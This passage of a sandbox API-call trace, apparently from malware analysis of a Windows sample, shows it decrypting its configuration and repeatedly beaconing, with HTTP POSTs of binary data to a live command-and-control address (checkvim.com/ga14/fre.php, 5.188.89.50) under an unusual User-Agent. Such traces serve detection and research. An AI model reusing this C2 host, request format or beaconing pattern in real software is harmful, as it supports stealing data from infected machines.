0x840000 [0246.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0246.821] GetProcessHeap () returned 0x840000 [0246.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0246.821] GetProcessHeap () returned 0x840000 [0246.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0246.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb4c) returned 0x360 [0246.853] Sleep (dwMilliseconds=0xea60) [0246.854] GetProcessHeap () returned 0x840000 [0246.854] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcb0 [0246.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.920] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0246.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.929] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0246.936] GetProcessHeap () returned 0x840000 [0246.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0246.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.938] CryptImportKey (in: hProv=0x86f798, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0246.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.939] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0246.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.940] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.940] GetProcessHeap () returned 0x840000 [0246.940] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0246.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.941] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcb0, pdwDataLen=0x19f9a4 | out: pbData=0x87fcb0, pdwDataLen=0x19f9a4) returned 1 [0246.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.947] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0246.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.948] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0246.948] GetProcessHeap () returned 0x840000 [0246.948] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0246.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.949] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.951] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.952] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.956] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.956] GetProcessHeap () returned 0x840000 [0246.956] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0246.961] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0246.994] GetProcessHeap () returned 0x840000 [0246.994] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0246.995] GetProcessHeap () returned 0x840000 [0246.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0246.995] GetProcessHeap () returned 0x840000 [0246.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0246.995] GetProcessHeap () returned 0x840000 [0246.995] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0246.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.996] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0247.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.007] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0247.017] GetProcessHeap () returned 0x840000 [0247.017] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0247.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.019] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0247.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.020] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0247.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.021] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.021] GetProcessHeap () returned 0x840000 [0247.021] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0247.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.023] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0247.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.024] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0247.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.025] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0247.025] GetProcessHeap () returned 0x840000 [0247.025] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0247.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.026] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0247.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.027] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0247.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.029] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0247.029] GetProcessHeap () returned 0x840000 [0247.029] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0247.029] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0247.033] GetProcessHeap () returned 0x840000 [0247.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0247.033] socket (af=2, type=1, protocol=6) returned 0x364 [0247.033] connect (s=0x364, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0247.106] FreeAddrInfoW (pAddrInfo=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0247.106] GetProcessHeap () returned 0x840000 [0247.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f930 [0247.106] GetProcessHeap () returned 0x840000 [0247.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0247.107] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0247.107] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0247.107] GetProcessHeap () returned 0x840000 [0247.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0247.107] GetProcessHeap () returned 0x840000 [0247.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0247.108] GetProcessHeap () returned 0x840000 [0247.108] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0247.108] GetProcessHeap () returned 0x840000 [0247.108] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0247.109] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0247.109] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0247.110] GetProcessHeap () returned 0x840000 [0247.110] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0247.110] GetProcessHeap () returned 0x840000 [0247.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0247.110] send (s=0x364, buf=0x873a58*, len=237, flags=0) returned 237 [0247.111] send (s=0x364, buf=0x87eb58*, len=159, flags=0) returned 159 [0247.111] GetProcessHeap () returned 0x840000 [0247.111] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0247.111] recv (in: s=0x364, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0247.468] GetProcessHeap () returned 0x840000 [0247.468] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0247.468] GetProcessHeap () returned 0x840000 [0247.468] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0247.468] GetProcessHeap () returned 0x840000 [0247.468] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0247.468] GetProcessHeap () returned 0x840000 [0247.468] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f930 | out: hHeap=0x840000) returned 1 [0247.468] closesocket (s=0x364) returned 0 [0247.511] GetProcessHeap () returned 0x840000 [0247.511] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0247.511] GetProcessHeap () returned 0x840000 [0247.511] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0247.511] GetProcessHeap () returned 0x840000 [0247.511] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0247.511] GetProcessHeap () returned 0x840000 [0247.511] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0247.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x948) returned 0x364 [0247.519] Sleep (dwMilliseconds=0xea60) [0247.562] GetProcessHeap () returned 0x840000 [0247.562] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0247.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.564] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0247.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.578] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0247.590] GetProcessHeap () returned 0x840000 [0247.590] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0247.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.591] CryptImportKey (in: hProv=0x86fce8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0247.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.592] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0247.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.593] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.593] GetProcessHeap () returned 0x840000 [0247.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0247.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.594] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0247.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.595] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0247.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.596] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0247.596] GetProcessHeap () returned 0x840000 [0247.596] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0247.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.598] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.599] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.601] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.602] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.602] GetProcessHeap () returned 0x840000 [0247.602] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0247.602] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0247.602] GetProcessHeap () returned 0x840000 [0247.602] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0247.602] GetProcessHeap () returned 0x840000 [0247.603] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0247.603] GetProcessHeap () returned 0x840000 [0247.603] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0247.603] GetProcessHeap () returned 0x840000 [0247.603] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0247.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.604] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0247.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.610] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0247.619] GetProcessHeap () returned 0x840000 [0247.619] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0247.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.629] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0247.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.630] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0247.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.631] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.631] GetProcessHeap () returned 0x840000 [0247.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0247.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.632] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0247.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.645] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0247.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0247.647] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0247.647] GetProcessHeap () returned 0x840000 [0247.647] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0247.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.648] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0247.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.656] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0247.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.658] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0247.658] GetProcessHeap () returned 0x840000 [0247.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0247.658] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0247.663] GetProcessHeap () returned 0x840000 [0247.663] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0247.663] socket (af=2, type=1, protocol=6) returned 0x368 [0247.663] connect (s=0x368, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0247.733] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0247.733] GetProcessHeap () returned 0x840000 [0247.733] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0247.733] GetProcessHeap () returned 0x840000 [0247.733] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0247.733] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0247.734] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0247.734] GetProcessHeap () returned 0x840000 [0247.734] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0247.734] GetProcessHeap () returned 0x840000 [0247.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0247.734] GetProcessHeap () returned 0x840000 [0247.734] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0247.734] GetProcessHeap () returned 0x840000 [0247.734] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0247.735] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0247.736] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0247.736] GetProcessHeap () returned 0x840000 [0247.736] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0247.736] GetProcessHeap () returned 0x840000 [0247.736] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0247.736] send (s=0x368, buf=0x873a58*, len=237, flags=0) returned 237 [0247.737] send (s=0x368, buf=0x87eb58*, len=159, flags=0) returned 159 [0247.737] GetProcessHeap () returned 0x840000 [0247.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8805c8 [0247.737] recv (in: s=0x368, buf=0x8805c8, len=4048, flags=0 | out: buf=0x8805c8*) returned 237 [0248.126] GetProcessHeap () returned 0x840000 [0248.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0248.126] GetProcessHeap () returned 0x840000 [0248.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0248.126] GetProcessHeap () returned 0x840000 [0248.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0248.126] GetProcessHeap () returned 0x840000 [0248.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0248.126] closesocket (s=0x368) returned 0 [0248.127] GetProcessHeap () returned 0x840000 [0248.127] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0248.127] GetProcessHeap () returned 0x840000 [0248.127] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0248.127] GetProcessHeap () returned 0x840000 [0248.127] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0248.127] GetProcessHeap () returned 0x840000 [0248.127] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0248.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8805c8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa14) returned 0x368 [0248.129] Sleep (dwMilliseconds=0xea60) [0248.134] GetProcessHeap () returned 0x840000 [0248.134] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0248.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.156] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0248.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.163] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0248.173] GetProcessHeap () returned 0x840000 [0248.173] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0248.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.174] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0248.175] LoadLibraryW 